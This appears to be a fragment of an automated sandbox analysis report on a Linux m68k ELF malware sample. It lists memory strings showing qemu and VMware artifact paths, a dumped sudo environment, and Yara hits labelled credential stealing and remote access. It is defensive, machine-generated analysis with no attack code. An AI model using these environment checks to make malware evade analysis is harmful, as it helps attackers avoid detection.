                Source: m68k.nn.elf, 6230.1.000055b3a5efb000.000055b3a5fa4000.rw-.sdmpBinary or memory string: !/usr/bin/column0!/var/run/avahi-daemon1/usr/bin/tput/m68k/a10!/usr/bin/xfce4-about!/var/run/acpid.socket1/usr/bin/setmetamode/a10!/usr/bin/notify-send!/var/run/vmware
                Source: m68k.nn.elf, 6215.1.00007ffe9271a000.00007ffe9273b000.rw-.sdmpBinary or memory string: /qemu-open.XXXXXGNU
                Source: m68k.nn.elf, 6230.1.000055b3a5efb000.000055b3a5fa4000.rw-.sdmpBinary or memory string: /m68k/usr/bin/vmware-vmblock-fuse
                Source: m68k.nn.elf, 6215.1.000055b3a5efb000.000055b3a5fa4000.rw-.sdmp, m68k.nn.elf, 6230.1.000055b3a5efb000.000055b3a5fa4000.rw-.sdmpBinary or memory string: U1/usr/bin/x86_64-linux-gnu-ld.gold!/usr/bin/qemu-ppc!/usr/bin/gpgconfj
                Source: m68k.nn.elf, 6230.1.000055b3a5efb000.000055b3a5fa4000.rw-.sdmpBinary or memory string: !/usr/bin/pl2pm0!/usr/bin/getcifsacl!/usr/bin/nc.openbsdk/us1/usr/bin/gpgcomposek/10!/usr/bin/cut01/usr/bin/vmware-vgauth-smoketest!/usr/bin/foo2zjs-pstops1/usr/bin/setxkbmap8k/s10!/usr/bin/xxd0!/usr/bin/gprof1/usr/bin/hp-clean68k/s10!/usr/bin/nano0!/usr/bin/rlogin1/usr/bin/transicc68k/s10!/usr/bin/bc0!/usr/bin/lsusb1/usr/bin/xfce4-notifyd-config0!/usr/bin/openssl!/usr/bin/lzless1/usr/bin/xfce4-screensaver-preferences!/usr/bin/glxinfo!/usr/bin/xzdiff1/usr/bin/nproc/m68k/10!/usr/bin/gnome-terminal!/usr/bin/telnet!/usr/bin/mono-api-check1/usr/bin/desktop-file-validate0!/usr/bin/rstartd1/usr/bin/xfwm4-workspace-settings!/usr/bin/perl5.30.01/usr/bin/foo2xqx-wrapper
                Source: m68k.nn.elf, 6230.1.000055b3a5efb000.000055b3a5fa4000.rw-.sdmpBinary or memory string: U1/usr/bin/foo2xqxm68k/s10!/usr/bin/cloud-id!/usr/bin/vmhgfs-fuseU1/usr/bin/gst-inspect-1.00!/usr/bin/cpp-90!/usr/bin/byobu-ugraph!/usr/bin/jsonschemak/us!/usr/bin/sg_syncm68k/us1/usr/bin/pldd/m68k/
                Source: m68k.nn.elf, 6215.1.000055b3a5efb000.000055b3a5fa4000.rw-.sdmp, m68k.nn.elf, 6230.1.000055b3a5efb000.000055b3a5fa4000.rw-.sdmpBinary or memory string: /usr/bin/qemu-mips64
                Source: m68k.nn.elf, 6215.1.000055b3a5efb000.000055b3a5fa4000.rw-.sdmp, m68k.nn.elf, 6230.1.000055b3a5efb000.000055b3a5fa4000.rw-.sdmpBinary or memory string: U1/usr/bin/qemu-arm68k/s10!/usr/bin/foo2slx!/usr/bin/xinput0`
                Source: m68k.nn.elf, 6215.1.000055b3a5efb000.000055b3a5fa4000.rw-.sdmp, m68k.nn.elf, 6230.1.000055b3a5efb000.000055b3a5fa4000.rw-.sdmpBinary or memory string: P /usr/bin/qemu-nios2
                Source: m68k.nn.elf, 6215.1.000055b3a5efb000.000055b3a5fa4000.rw-.sdmp, m68k.nn.elf, 6230.1.000055b3a5efb000.000055b3a5fa4000.rw-.sdmpBinary or memory string: /m68k/usr/bin/qemu-alpha
                Source: m68k.nn.elf, 6215.1.000055b3a5efb000.000055b3a5fa4000.rw-.sdmp, m68k.nn.elf, 6230.1.000055b3a5efb000.000055b3a5fa4000.rw-.sdmpBinary or memory string: /m68k/usr/bin/qemu-sh4eb
                Source: m68k.nn.elf, 6230.1.000055b3a5efb000.000055b3a5fa4000.rw-.sdmpBinary or memory string: /usr/bin/vmware-checkvm
                Source: m68k.nn.elf, 6230.1.000055b3a5efb000.000055b3a5fa4000.rw-.sdmpBinary or memory string: U/m68k/dev/vmci!/dev/zfs1
                Source: m68k.nn.elf, 6215.1.000055b3a5efb000.000055b3a5fa4000.rw-.sdmp, m68k.nn.elf, 6230.1.000055b3a5efb000.000055b3a5fa4000.rw-.sdmpBinary or memory string: /usr/bin/qemu-arm
                Source: m68k.nn.elf, 6215.1.000055b3a5efb000.000055b3a5fa4000.rw-.sdmp, m68k.nn.elf, 6230.1.000055b3a5efb000.000055b3a5fa4000.rw-.sdmpBinary or memory string: /m68k/usr/bin/qemu-mipsn32el
                Source: m68k.nn.elf, 6215.1.000055b3a5efb000.000055b3a5fa4000.rw-.sdmp, m68k.nn.elf, 6230.1.000055b3a5efb000.000055b3a5fa4000.rw-.sdmpBinary or memory string: /m68k/usr/bin/qemu-cris
                Source: m68k.nn.elf, 6215.1.000055b3a5efb000.000055b3a5fa4000.rw-.sdmp, m68k.nn.elf, 6230.1.000055b3a5efb000.000055b3a5fa4000.rw-.sdmpBinary or memory string: /usr/bin/qemu-mipsel
                Source: m68k.nn.elf, 6230.1.000055b3a5efb000.000055b3a5fa4000.rw-.sdmpBinary or memory string: /usr/bin/vmware-vgauth-smoketest
                Source: m68k.nn.elf, 6230.1.000055b3a5efb000.000055b3a5fa4000.rw-.sdmpBinary or memory string: !/usr/bin/bluetoothctl1/usr/bin/vmware-namespace-cmd0!/usr/bin/taskset!/usr/bin/gsbj1/usr/bin/lzmore/m68k/s10!/usr/bin/setpci0!/usr/bin/setarch1/usr/bin/systemd-escape10!/usr/bin/xedit0!/usr/bin/libreoffice1/usr/bin/inxi/m68k/s10!/usr/bin/aseqdump!/usr/bin/lzegrep1/usr/bin/vmware-hgfsclient0!/usr/bin/xev0!/usr/bin/pax11publish1/usr/bin/glxdemom68k/s10!/usr/bin/gem0!/usr/bin/ucs2any1/usr/bin/watchgnupgk/s10!/usr/bin/hbpldecode!/usr/bin/koi8rxterm1/usr/bin/xflock4m68k/s10!/usr/bin/luit0!/usr/bin/qemu-riscv321/usr/bin/ruby/m68k/s10!/usr/bin/xcutsel!/usr/bin/jsondiff1/usr/bin/vimdiffm68k/s10!/usr/bin/paplay0!/usr/bin/man-recode1/usr/bin/time/m68k/10!/usr/bin/sudoedit!/usr/bin/pycompile1/usr/bin/mono-configuration-cryptoR
                Source: m68k.nn.elf, 6215.1.000055b3a5efb000.000055b3a5fa4000.rw-.sdmp, m68k.nn.elf, 6230.1.000055b3a5efb000.000055b3a5fa4000.rw-.sdmpBinary or memory string: U/m68k/us1/usr/bin/xkbevd/m68k/A01/usr/bin/btrfs-select-super@!/usr/bin/caspol1/usr/bin/objcopym68k/s10!/usr/bin/pdftoppm!/usr/bin/info1/usr/bin/pod2html68k/s10!/usr/bin/rrsync0!/usr/bin/psfgettable1/usr/bin/less/m68k/s10!/usr/bin/gpu-manager!/usr/bin/expr!/usr/bin/xzcmp/m68k/us!/usr/bin/qemu-or1k8k/us!/usr/bin/gst-launch-1.0AP:
                Source: m68k.nn.elf, 6215.1.000055b3a5efb000.000055b3a5fa4000.rw-.sdmp, m68k.nn.elf, 6230.1.000055b3a5efb000.000055b3a5fa4000.rw-.sdmpBinary or memory string: /usr/bin/qemu-ppc64abi32
                Source: m68k.nn.elf, 6215.1.000055b3a5efb000.000055b3a5fa4000.rw-.sdmp, m68k.nn.elf, 6230.1.000055b3a5efb000.000055b3a5fa4000.rw-.sdmpBinary or memory string: U/m68k/s10!/usr/bin/ristretto!/usr/bin/ssh-argv01/usr/bin/qemu-microblaze0!/usr/bin/qemu-ppc64le!/usr/bin/lspci1/usr/bin/zegrep/m68k/10!/usr/bin/tty0!/usr/bin/unpack2001/usr/bin/desktop-file-edit
                Source: m68k.nn.elf, 6215.1.000055b3a5efb000.000055b3a5fa4000.rw-.sdmp, m68k.nn.elf, 6230.1.000055b3a5efb000.000055b3a5fa4000.rw-.sdmpBinary or memory string: U!/etc/qemu-binfmt/m68k
                Source: m68k.nn.elf, 6215.1.000055b3a5efb000.000055b3a5fa4000.rw-.sdmp, m68k.nn.elf, 6230.1.000055b3a5efb000.000055b3a5fa4000.rw-.sdmpBinary or memory string: U/m68k/s10!/usr/bin/link0!/usr/bin/gnome-software1/usr/bin/pidof/m68k/s10!/usr/bin/printafm!/usr/bin/lsmod1/usr/bin/gnome-terminal.real0!/usr/bin/psfxtable!/usr/bin/apt-config1/usr/bin/poff/m68k/s10!/usr/bin/hp-pkservice!/usr/bin/qemu-xtensa1/usr/bin/jsonpatch-jsondiff0!/usr/bin/sg_map26!/usr/bin/pedump1/usr/bin/aproposm68k/s10!/usr/bin/viewres!/usr/bin/pkexec1/usr/bin/dbus-cleanup-sockets
                Source: m68k.nn.elf, 6230.1.000055b3a5efb000.000055b3a5fa4000.rw-.sdmpBinary or memory string: /usr/bin/vmware-vgauth-cmd
                Source: m68k.nn.elf, 6230.1.000055b3a5efb000.000055b3a5fa4000.rw-.sdmpBinary or memory string: !/usr/bin/systemctl1/usr/bin/vmware-toolbox-cmd`!/usr/bin/volname1/usr/bin/lz4cat/m68k/10!/usr/bin/touch0!/usr/bin/chfn1/usr/bin/i686-linux-gnu-pkg-configR
                Source: m68k.nn.elf, 6230.1.000055b3a5efb000.000055b3a5fa4000.rw-.sdmpBinary or memory string: /usr/bin/vmware-vmblock-fuse
                Source: m68k.nn.elf, 6215.1.000055b3a5efb000.000055b3a5fa4000.rw-.sdmp, m68k.nn.elf, 6230.1.000055b3a5efb000.000055b3a5fa4000.rw-.sdmpBinary or memory string: /usr/bin/qemu-x86_64
                Source: m68k.nn.elf, 6215.1.000055b3a5efb000.000055b3a5fa4000.rw-.sdmp, m68k.nn.elf, 6230.1.000055b3a5efb000.000055b3a5fa4000.rw-.sdmpBinary or memory string: !/usr/bin/mscompress!/usr/bin/rename.ul1/usr/bin/namei/m68k/s10!/usr/bin/partx01/usr/bin/x86_64-linux-gnu-dwp1/usr/bin/systemd-machine-id-setup!/usr/bin/mailmail3!/usr/bin/logger1/usr/bin/pkmon/m68k/s10!/usr/bin/bundler2.7!/usr/bin/mkbundle1/usr/bin/grep/m68k/s10!/usr/bin/rake0!/usr/bin/newgrp1/usr/bin/byobu-launchs10!/usr/bin/ld0!/usr/bin/xlsclients1/usr/bin/w.procps68k/s10!/usr/bin/monodoc-http!/usr/bin/sg_write_long1/usr/bin/jexec/m68k/s10!/usr/bin/reset0!/usr/bin/ionice1/usr/bin/avahi-publish-address0!/usr/bin/geteltorito1/usr/bin/gimp-test-clipboard-2.01/usr/bin/ubuntu-advantage0!/usr/bin/snap0!/usr/bin/sg_rdac1/usr/bin/view/m68k/s10!/usr/bin/jsonpointer!/usr/bin/ciptool1/usr/bin/do-release-upgrade0!/usr/bin/setleds!/usr/bin/qemu-tilegx1/usr/bin/sessregm68k/s10!/usr/bin/dpkg-divert!/usr/bin/run-parts1/usr/bin/cautious-launcher0!/usr/bin/funzip0!/usr/bin/cli-csc1/usr/bin/tkconch368k/s10!/usr/bin/tr0!/usr/bin/sg_rep_zones1/usr/bin/qemu-microblazeel0!/usr/bin/foo2ddst!/usr/bin/showrgb1/usr/bin/sg
                Source: m68k.nn.elf, 6230.1.000055b3a5efb000.000055b3a5fa4000.rw-.sdmpBinary or memory string: !/usr/bin/systemd-id1281/usr/bin/vmware-vgauth-cmd`!/usr/bin/readelf1/usr/bin/patch/m68k/10!/usr/bin/pdf2ps0!/usr/bin/tic1/usr/bin/ssh-import-id-gh
                Source: m68k.nn.elf, 6215.1.000055b3a5efb000.000055b3a5fa4000.rw-.sdmp, m68k.nn.elf, 6230.1.000055b3a5efb000.000055b3a5fa4000.rw-.sdmpBinary or memory string: /usr/bin/qemu-sparc
                Source: m68k.nn.elf, 6230.1.000055b3a5efb000.000055b3a5fa4000.rw-.sdmpBinary or memory string: /m68k/dev/vmci
                Source: m68k.nn.elf, 6215.1.000055b3a5efb000.000055b3a5fa4000.rw-.sdmp, m68k.nn.elf, 6230.1.000055b3a5efb000.000055b3a5fa4000.rw-.sdmpBinary or memory string: !/usr/bin/peekfd0!/usr/bin/rctest1/usr/bin/xmag/m68k/s10!/usr/bin/sbverify!/usr/bin/monop1/usr/bin/clear/m68k/s10!/usr/bin/atrm0!/usr/bin/mono-heapviz1/usr/bin/exo-open68k/s10!/usr/bin/dirmngr!/usr/bin/traceroute61/usr/bin/scsi_mandat/s10!/usr/bin/qemu-mips!/usr/bin/shuf1/usr/bin/nsupdate68k/s10!/usr/bin/xbiff0!/usr/bin/ping1/usr/bin/system-config-printer0!/usr/bin/ntfs-3g.probe!/usr/bin/pod2man1/usr/bin/foo2hbpl2-wrapper
                Source: m68k.nn.elf, 6215.1.000055b3a5efb000.000055b3a5fa4000.rw-.sdmp, m68k.nn.elf, 6230.1.000055b3a5efb000.000055b3a5fa4000.rw-.sdmpBinary or memory string: /usr/bin/qemu-riscv64
                Source: m68k.nn.elf, 6230.1.000055b3a5efb000.000055b3a5fa4000.rw-.sdmpBinary or memory string: U/m68k/dev/cdrom!/dev/vmci1p'
                Source: m68k.nn.elf, 6215.1.000055b3a5efb000.000055b3a5fa4000.rw-.sdmp, m68k.nn.elf, 6230.1.000055b3a5efb000.000055b3a5fa4000.rw-.sdmpBinary or memory string: !/usr/bin/ddstdecode!/usr/bin/lsipc1/usr/bin/xvinfo/m68k/s10!/usr/bin/nisdomainname!/usr/bin/fwupdmgr1/usr/bin/mdig/m68k/s10!/usr/bin/qemu-i386!/usr/bin/rsh1/usr/bin/xdotoolm68k/s10!/usr/bin/rygel0!/usr/bin/addr2line1/usr/bin/phar.phar8k/s10!/usr/bin/hp-check!/usr/bin/dig1/usr/bin/manpathm68k/s10!/usr/bin/vdir0!/usr/bin/pkttyagent1/usr/bin/iceauthm68k/s10!/usr/bin/hcitool!/usr/bin/sbvarsign1/usr/bin/xwud/m68k/s10!/usr/bin/ps0!/usr/bin/gedit1/usr/bin/git-upload-pack0!/usr/bin/xfburn0!/usr/bin/ri1/usr/bin/certmgrm68k/s10!/usr/bin/lpoptions!/usr/bin/pdb2.71/usr/bin/sg_ses_microcode0!/usr/bin/ischroot!/usr/bin/apt-sortpkgs1/usr/bin/speech-dispatcher
                Source: m68k.nn.elf, 6215.1.000055b3a5efb000.000055b3a5fa4000.rw-.sdmp, m68k.nn.elf, 6230.1.000055b3a5efb000.000055b3a5fa4000.rw-.sdmpBinary or memory string: /usr/bin/qemu-armeb
                Source: m68k.nn.elf, 6230.1.000055b3a5efb000.000055b3a5fa4000.rw-.sdmpBinary or memory string: /tmp/vmware-root_721-4290559889
                Source: m68k.nn.elf, 6230.1.000055b3a5efb000.000055b3a5fa4000.rw-.sdmpBinary or memory string: /usr/bin/vmware-rpctool
                Source: m68k.nn.elf, 6215.1.000055b3a5efb000.000055b3a5fa4000.rw-.sdmp, m68k.nn.elf, 6215.1.00007ffe9271a000.00007ffe9273b000.rw-.sdmp, m68k.nn.elf, 6230.1.00007ffe9271a000.00007ffe9273b000.rw-.sdmp, m68k.nn.elf, 6230.1.000055b3a5efb000.000055b3a5fa4000.rw-.sdmpBinary or memory string: /usr/bin/qemu-m68k
                Source: m68k.nn.elf, 6215.1.000055b3a5efb000.000055b3a5fa4000.rw-.sdmp, m68k.nn.elf, 6230.1.000055b3a5efb000.000055b3a5fa4000.rw-.sdmpBinary or memory string: P /usr/bin/qemu-sh4ebQ
                Source: m68k.nn.elf, 6230.1.000055b3a5efb000.000055b3a5fa4000.rw-.sdmpBinary or memory string: /m68k/usr/bin/vmware-vmblock-fuseQ`
                Source: m68k.nn.elf, 6215.1.00007ffe9271a000.00007ffe9273b000.rw-.sdmpBinary or memory string: /tmp/qemu-open.tu5Hfb
                Source: m68k.nn.elf, 6230.1.000055b3a5efb000.000055b3a5fa4000.rw-.sdmpBinary or memory string: /run/vmware
                Source: m68k.nn.elf, 6230.1.000055b3a5efb000.000055b3a5fa4000.rw-.sdmpBinary or memory string: /usr/bin/vmhgfs-fuse
                Source: m68k.nn.elf, 6215.1.000055b3a5efb000.000055b3a5fa4000.rw-.sdmp, m68k.nn.elf, 6230.1.000055b3a5efb000.000055b3a5fa4000.rw-.sdmpBinary or memory string: P /usr/bin/qemu-crisQ
                Source: m68k.nn.elf, 6230.1.000055b3a5efb000.000055b3a5fa4000.rw-.sdmpBinary or memory string: U/m68k/a10!/usr/bin/stty0!/home1/usr/bin/ubuntu-security-status!/home/saturnino1/usr/bin/ppdc/m68k/o10!/usr/bin/strings!/usr/bin/foo2hp1/usr/bin/xsetwacom8k/s10!/usr/bin/byobu-janitor!/usr/bin/catchsegv1/usr/bin/vmware-xferlogs0!/usr/bin/host0!/usr/bin/grub-glue-efi!/usr/bin/sg_xcopy68k/us1/usr/bin/ntfsdecrypt/s10!/usr/bin/alsaucm1/usr/bin/xfce4-appfinder`!/usr/bin/foo2zjs1/usr/bin/twistd3m68k/s10!/usr/bin/soffice!/usr/bin/bzless1/usr/bin/xfce4-screensaver-command!/usr/bin/kmod0!/usr/bin/mprof-report1/usr/bin/lzfgrepm68k/s10!/usr/bin/pager0!/usr/bin/ntfswipe1/usr/bin/revU/m68k/s10!/usr/bin/cli-sn0!/usr/bin/soelim!/usr/bin/tset/m68k/us1/usr/bin/ntfs-3gm68k/s10!/usr/bin/piconv01/usr/bin/xfce4-popup-applicationsmenu!/usr/bin/blueman-tray1/usr/bin/sg_readm68k/s10!/usr/bin/btrfstune!/usr/bin/mesg1/usr/bin/x86_64-linux-gnu-objcopy
                Source: m68k.nn.elf, 6230.1.000055b3a5efb000.000055b3a5fa4000.rw-.sdmpBinary or memory string: /dev/vmci
                Source: m68k.nn.elf, 6230.1.000055b3a5efb000.000055b3a5fa4000.rw-.sdmpBinary or memory string: /usr/bin/vmwarectrlQ
                Source: m68k.nn.elf, 6215.1.00007ffe9271a000.00007ffe9273b000.rw-.sdmpBinary or memory string: U/tmp/qemu-open.tu5Hfb-
                Source: m68k.nn.elf, 6215.1.000055b3a5efb000.000055b3a5fa4000.rw-.sdmp, m68k.nn.elf, 6230.1.000055b3a5efb000.000055b3a5fa4000.rw-.sdmpBinary or memory string: P /usr/bin/qemu-mipsn32Q
                Source: m68k.nn.elf, 6215.1.000055b3a5efb000.000055b3a5fa4000.rw-.sdmp, m68k.nn.elf, 6230.1.000055b3a5efb000.000055b3a5fa4000.rw-.sdmpBinary or memory string: U/m68k/usr/bin/qemu-alpha
                Source: m68k.nn.elf, 6230.1.000055b3a5efb000.000055b3a5fa4000.rw-.sdmpBinary or memory string: U1!/usr/bin/vmtoolsd
                Source: m68k.nn.elf, 6215.1.000055b3a5efb000.000055b3a5fa4000.rw-.sdmp, m68k.nn.elf, 6230.1.000055b3a5efb000.000055b3a5fa4000.rw-.sdmpBinary or memory string: !/usr/bin/login0!/usr/bin/xz1/usr/bin/csharp/m68k/s10!/usr/bin/unxz0!/usr/bin/sudoreplay1/usr/bin/lslogins68k/s10!/usr/bin/gsnd0!/usr/bin/isoinfo1/usr/bin/dirU/m68k/s10!/usr/bin/ssh0!/usr/bin/lpr1/usr/bin/ps2pdf1468k/s10!/usr/bin/sdptool!/usr/bin/lzgrep1/usr/bin/mawk/m68k/s10!/usr/bin/qemu-sh4!/usr/bin/al1/usr/bin/bccmd/m68k/s10!/usr/bin/pstree01/usr/bin/xfce4-panel-profiles1/usr/bin/grub-fstest/s10!/usr/bin/fprintd-verify!/usr/bin/ruby2.71/usr/bin/printer-profile0!/usr/bin/pftp0!/usr/bin/uxterm1/usr/bin/driverlessk/10!/usr/bin/ppdmerge!/usr/bin/atq1/usr/bin/sgm_dd/m68k/s10!/usr/bin/im-launch!/usr/bin/hp-colorcal1/usr/bin/pyversionsk/s10!/usr/bin/gold0!/usr/bin/rbash1/usr/bin/gnome-keyring-30!/usr/bin/groff0!/usr/bin/uname1/usr/bin/jpgicc/m68k/s10!/usr/bin/unsquashfs!/usr/bin/pdfinfo1/usr/bin/upower/m68k/s10!/usr/bin/expiry01/usr/bin/x86_64-linux-gnu-size1/usr/bin/gnome-keyring10!/usr/bin/wpa_passphrase!/usr/bin/colrm1/usr/bin/dh_bash-completion
                Source: m68k.nn.elf, 6230.1.000055b3a5efb000.000055b3a5fa4000.rw-.sdmpBinary or memory string: U/m68k/usr/bin/vmwarectrlR
                Source: m68k.nn.elf, 6215.1.000055b3a5efb000.000055b3a5fa4000.rw-.sdmp, m68k.nn.elf, 6230.1.000055b3a5efb000.000055b3a5fa4000.rw-.sdmpBinary or memory string: !/usr/bin/lessfile!/usr/bin/truncate1/usr/bin/systemd-tmpfiles0!/usr/bin/xdg-user-dir1/usr/bin/systemd-inhibit1/usr/bin/systemd-tty-ask-password-agent!/usr/bin/msexpand!/usr/bin/apt1/usr/bin/alsaloop68k/s10!/usr/bin/pygettext2.7!/usr/bin/mkisofs1/usr/bin/pycleanm68k/10!/usr/bin/ptardiff!/usr/bin/qemu-m68k1/usr/bin/avahi-resolve-host-name
                Source: m68k.nn.elf, 6215.1.000055b3a5efb000.000055b3a5fa4000.rw-.sdmp, m68k.nn.elf, 6230.1.000055b3a5efb000.000055b3a5fa4000.rw-.sdmpBinary or memory string: /usr/bin/qemu-i386
                Source: m68k.nn.elf, 6215.1.000055b3a5efb000.000055b3a5fa4000.rw-.sdmp, m68k.nn.elf, 6230.1.000055b3a5efb000.000055b3a5fa4000.rw-.sdmpBinary or memory string: /usr/bin/qemu-or1k
                Source: m68k.nn.elf, 6230.1.000055b3a5efb000.000055b3a5fa4000.rw-.sdmpBinary or memory string: /usr/bin/vmwarectrl
                Source: m68k.nn.elf, 6215.1.000055b3a5efb000.000055b3a5fa4000.rw-.sdmp, m68k.nn.elf, 6230.1.000055b3a5efb000.000055b3a5fa4000.rw-.sdmpBinary or memory string: P /usr/bin/qemu-alphaQ
                Source: m68k.nn.elf, 6230.1.000055b3a5efb000.000055b3a5fa4000.rw-.sdmpBinary or memory string: /usr/bin/vmware-namespace-cmd
                Source: m68k.nn.elf, 6215.1.000055b3a5efb000.000055b3a5fa4000.rw-.sdmp, m68k.nn.elf, 6230.1.000055b3a5efb000.000055b3a5fa4000.rw-.sdmpBinary or memory string: !/usr/bin/ping60!/usr/bin/foo2hiperc1/usr/bin/xfce4-popup-places0!/usr/bin/qemu-s390x1/usr/bin/grub-menulst2cfg1/usr/bin/grub-ntldr-img10!/usr/bin/dbus-monitor!/usr/bin/slabtop1/usr/bin/aconnect68k/s10!/usr/bin/parecord!/usr/bin/xkbbell1/usr/bin/sg_wr_modek/s10!/usr/bin/pinky0!/usr/bin/fc-scan1/usr/bin/x86_64-linux-gnu-ar0!/usr/bin/pygettext3!/usr/bin/apt-cdrom1/usr/bin/gnome-shell-extension-tool
                Source: m68k.nn.elf, 6230.1.000055b3a5efb000.000055b3a5fa4000.rw-.sdmpBinary or memory string: /m68k/usr/bin/vmwarectrl
                Source: m68k.nn.elf, 6215.1.000055b3a5efb000.000055b3a5fa4000.rw-.sdmp, m68k.nn.elf, 6230.1.000055b3a5efb000.000055b3a5fa4000.rw-.sdmpBinary or memory string: /usr/bin/qemu-sparc64
                Source: m68k.nn.elf, 6215.1.000055b3a5efb000.000055b3a5fa4000.rw-.sdmp, m68k.nn.elf, 6230.1.000055b3a5efb000.000055b3a5fa4000.rw-.sdmpBinary or memory string: /usr/bin/qemu-xtensaeb
                Source: m68k.nn.elf, 6230.1.000055b3a5efb000.000055b3a5fa4000.rw-.sdmpBinary or memory string: /m68k/usr/bin/vmware-vgauth-smoketest
                Source: m68k.nn.elf, 6215.1.00007ffe9271a000.00007ffe9273b000.rw-.sdmp, m68k.nn.elf, 6230.1.00007ffe9271a000.00007ffe9273b000.rw-.sdmpBinary or memory string: x86_64/usr/bin/qemu-m68k/tmp/m68k.nn.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/m68k.nn.elf
                Source: m68k.nn.elf, 6215.1.000055b3a5efb000.000055b3a5fa4000.rw-.sdmp, m68k.nn.elf, 6230.1.000055b3a5efb000.000055b3a5fa4000.rw-.sdmpBinary or memory string: !/usr/bin/xclipboard!/usr/bin/mutter1/usr/bin/ucfU/m68k/s10!/usr/bin/snice0!/usr/bin/cli-al1/usr/bin/Thunar/m68k/s10!/usr/bin/vi01/usr/bin/qemu-aarch64_be1/usr/bin/ping4/m68k/s10!/usr/bin/netstat!/usr/bin/7zr1/usr/bin/x86_64-linux-gnu-cpp-90!/usr/bin/sg_read_attr!/usr/bin/cloud-init1/usr/bin/byobu-launcher-uninstall
                Source: m68k.nn.elf, 6215.1.000055b3a5efb000.000055b3a5fa4000.rw-.sdmp, m68k.nn.elf, 6230.1.000055b3a5efb000.000055b3a5fa4000.rw-.sdmpBinary or memory string: /usr/bin/qemu-xtensa
                Source: m68k.nn.elf, 6215.1.000055b3a5efb000.000055b3a5fa4000.rw-.sdmp, m68k.nn.elf, 6230.1.000055b3a5efb000.000055b3a5fa4000.rw-.sdmpBinary or memory string: P /usr/bin/qemu-mipsn32elQ
                Source: m68k.nn.elf, 6215.1.000055b3a5efb000.000055b3a5fa4000.rw-.sdmp, m68k.nn.elf, 6230.1.000055b3a5efb000.000055b3a5fa4000.rw-.sdmpBinary or memory string: !/usr/bin/xdg-settings!/usr/bin/pacmd1/usr/bin/phar/m68k/s10!/usr/bin/7z0!/usr/bin/ncal1/usr/bin/inputattach/s10!/usr/bin/diff0!/usr/bin/cpp1/usr/bin/sg_requests/s10!/usr/bin/ucfq0!/usr/bin/zcmp1/usr/bin/run-mailcap/s10!/usr/bin/cmp0!/usr/bin/fc-validate1/usr/bin/gzip/m68k/s10!/usr/bin/fwupdtool1/usr/bin/btrfs-find-root1/usr/bin/x-terminal-emulator0!/usr/bin/gpasswd!/usr/bin/startx1/usr/bin/qemu-sparck/s10!/usr/bin/onboard!/usr/bin/codepage1/usr/bin/col7/m68k/s10!/usr/bin/sg_scan!/usr/bin/ss1/usr/bin/fprintd-enroll10!/usr/bin/java01/usr/bin/scp-dbus-service1/usr/bin/axfer/m68k/10!/usr/bin/ppdi0!/usr/bin/col41/usr/bin/foo2hp2600-wrapper
                Source: m68k.nn.elf, 6215.1.000055b3a5efb000.000055b3a5fa4000.rw-.sdmp, m68k.nn.elf, 6230.1.000055b3a5efb000.000055b3a5fa4000.rw-.sdmpBinary or memory string: /m68k/usr/bin/qemu-microblazeel
                Source: m68k.nn.elf, 6215.1.000055b3a5efb000.000055b3a5fa4000.rw-.sdmp, m68k.nn.elf, 6230.1.000055b3a5efb000.000055b3a5fa4000.rw-.sdmpBinary or memory string: /usr/bin/qemu-mips
                Source: m68k.nn.elf, 6215.1.000055b3a5efb000.000055b3a5fa4000.rw-.sdmp, m68k.nn.elf, 6230.1.000055b3a5efb000.000055b3a5fa4000.rw-.sdmpBinary or memory string: /m68k/usr/bin/qemu-nios2
                Source: m68k.nn.elf, 6215.1.000055b3a5efb000.000055b3a5fa4000.rw-.sdmp, m68k.nn.elf, 6230.1.000055b3a5efb000.000055b3a5fa4000.rw-.sdmpBinary or memory string: /usr/bin/qemu-tilegx
                Source: m68k.nn.elf, 6215.1.000055b3a5efb000.000055b3a5fa4000.rw-.sdmp, m68k.nn.elf, 6230.1.000055b3a5efb000.000055b3a5fa4000.rw-.sdmpBinary or memory string: U/m68k/usr/bin/qemu-cris
                Source: m68k.nn.elf, 6215.1.000055b3a5efb000.000055b3a5fa4000.rw-.sdmp, m68k.nn.elf, 6230.1.000055b3a5efb000.000055b3a5fa4000.rw-.sdmpBinary or memory string: /usr/bin/qemu-aarch64_be
                Source: m68k.nn.elf, 6215.1.000055b3a5efb000.000055b3a5fa4000.rw-.sdmp, m68k.nn.elf, 6230.1.000055b3a5efb000.000055b3a5fa4000.rw-.sdmpBinary or memory string: /usr/bin/qemu-mipsn32el

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: m68k.nn.elf, type: SAMPLE
                Source: Yara matchFile source: 6215.1.00007fd1cc001000.00007fd1cc01c000.r-x.sdmp, type: MEMORY
                Source: Yara matchFile source: 6230.1.00007fd1cc001000.00007fd1cc01c000.r-x.sdmp, type: MEMORY
                Source: Yara matchFile source: m68k.nn.elf, type: SAMPLE
                Source: Yara matchFile source: 6215.1.00007fd1cc001000.00007fd1cc01c000.r-x.sdmp, type: MEMORY
                Source: Yara matchFile source: 6230.1.00007fd1cc001000.00007fd1cc01c000.r-x.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: m68k.nn.elf PID: 6215, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: m68k.nn.elf PID: 6230, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: m68k.nn.elf, type: SAMPLE
                Source: Yara matchFile source: 6215.1.00007fd1cc001000.00007fd1cc01c000.r-x.sdmp, type: MEMORY
                Source: Yara matchFile source: 6230.1.00007fd1cc001000.00007fd1cc01c000.r-x.sdmp, type: MEMORY
                Source: Yara matchFile source: m68k.nn.elf, type: SAMPLE
                Source: Yara matchFile source: 6215.1.00007fd1cc001000.00007fd1cc01c000.r-x.sdmp, type: MEMORY
                Source: Yara matchFile source: 6230.1.00007fd1cc001000.00007fd1cc01c000.r-x.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: m68k.nn.elf PID: 6215, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: m68k.nn.elf PID: 6230, type: MEMORYSTR
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
